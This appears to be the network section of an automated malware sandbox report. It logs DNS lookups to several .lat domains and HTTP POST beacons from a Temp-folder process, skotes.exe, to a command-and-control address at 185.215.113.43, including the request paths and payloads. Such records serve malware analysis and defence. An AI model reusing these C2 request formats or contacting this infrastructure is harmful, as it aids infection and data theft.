                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.908376932 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.909364939 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.909420967 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.909476042 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.909763098 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.910495996 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.910582066 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.910594940 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.910811901 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.911597013 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.911715984 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.911915064 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.912688017 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.912796021 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.912803888 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.913798094 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.913830996 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.913937092 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.913944960 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.914032936 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.914958000 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.915071011 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.915132999 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.916037083 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.916083097 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.916171074 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.916970968 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.917151928 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.917258978 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.917259932 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.917305946 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.918324947 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.918361902 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.918390989 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.918941021 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.919364929 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.919404984 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.919478893 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.919522047 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.920491934 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.920535088 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.920579910 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.920615911 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.921601057 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.921658039 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.921700954 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.921758890 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.922705889 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.922847033 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.922900915 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.923825979 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.923897982 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.923958063 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.924000978 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.924921989 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.925029039 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.925190926 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.926028013 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.926135063 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.926331997 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.927165031 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.927203894 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.927257061 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.927285910 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.928280115 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.928385973 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.928452969 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.929411888 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.929510117 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.929572105 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.930041075 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.930479050 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.930530071 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.930591106 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.930661917 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.931605101 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.931693077 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.931710958 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.931832075 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.932715893 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.932832003 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.932893038 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.933834076 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.933967113 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.934293985 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.934936047 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.935018063 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.935048103 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.935095072 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.936065912 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.936131001 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.936147928 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.936422110 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.937141895 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.937261105 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.937263012 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.937421083 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.938266039 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.938369989 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.938491106 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.939367056 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.939433098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.939553022 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.940520048 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.940562963 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.940603971 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.940643072 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.941585064 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.941694975 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.941699982 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.941951990 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.942737103 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.942850113 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.942974091 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.943871975 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.944015980 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.944031000 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.944081068 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.944999933 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.945095062 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.945163965 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.946099043 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.946197033 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.946302891 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.947170973 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.947289944 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.947341919 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.948309898 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.948367119 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.948498964 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.948577881 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.949409962 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.949506044 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.949529886 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.950196028 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.950522900 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.950639009 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.950658083 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.950959921 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.951628923 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.951668978 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.951724052 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.951762915 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.952712059 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.952753067 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.952845097 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.952989101 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.953841925 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.953891039 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.953928947 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.954065084 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.954977989 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.955081940 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.955140114 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.956049919 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.956104040 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.956192970 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.956294060 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.957307100 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.957436085 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.957545042 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.958285093 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.958327055 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.958424091 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.959217072 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.959393978 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.959486961 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.959515095 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.959553957 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.960501909 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.960577965 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.960617065 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.960669994 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.961601973 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.961730957 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.961900949 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.962721109 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.962799072 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.963059902 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.097872019 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.097889900 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.097923994 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.097923994 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.245203972 CET44349918104.21.64.80192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.245333910 CET49918443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.463579893 CET44349922104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.463654041 CET49922443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.554972887 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:11.555061102 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:12.323013067 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:12.323168993 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:13.762973070 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:13.763026953 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:16.611263990 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:16.611319065 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:21.986998081 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:21.987077951 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.241851091 CET5598453192.168.2.41.1.1.1
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.380851030 CET53559841.1.1.1192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.243412018 CET5975653192.168.2.41.1.1.1
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.383369923 CET53597561.1.1.1192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.035229921 CET5436953192.168.2.41.1.1.1
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.358251095 CET53543691.1.1.1192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.378331900 CET5323753192.168.2.41.1.1.1
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.602406979 CET53532371.1.1.1192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.606668949 CET5868753192.168.2.41.1.1.1
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.018122911 CET53586871.1.1.1192.168.2.4
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.241851091 CET192.168.2.41.1.1.10x1f85Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.243412018 CET192.168.2.41.1.1.10x4483Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.035229921 CET192.168.2.41.1.1.10xdcf9Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.378331900 CET192.168.2.41.1.1.10xdbacStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.606668949 CET192.168.2.41.1.1.10x4b91Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.380851030 CET1.1.1.1192.168.2.40x1f85No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.383369923 CET1.1.1.1192.168.2.40x4483No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.383369923 CET1.1.1.1192.168.2.40x4483No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.383369923 CET1.1.1.1192.168.2.40x4483No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.383369923 CET1.1.1.1192.168.2.40x4483No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.358251095 CET1.1.1.1192.168.2.40xdcf9No error (0)aspecteirs.lat104.21.66.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:59.358251095 CET1.1.1.1192.168.2.40xdcf9No error (0)aspecteirs.lat172.67.157.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:09.602406979 CET1.1.1.1192.168.2.40xdbacName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.018122911 CET1.1.1.1192.168.2.40x4b91No error (0)grannyejh.lat104.21.64.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.018122911 CET1.1.1.1192.168.2.40x4b91No error (0)grannyejh.lat172.67.179.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        • github.com
                                                                                                                                                                                                                                        • raw.githubusercontent.com
                                                                                                                                                                                                                                        • aspecteirs.lat
                                                                                                                                                                                                                                        • 185.215.113.43
                                                                                                                                                                                                                                        • 31.41.244.11
                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.449748185.215.113.43807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:04.159213066 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:05.497010946 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:05 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.449754185.215.113.43807832C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:07.178826094 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                        Content-Length: 154
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:09.829411983 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:09:09 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
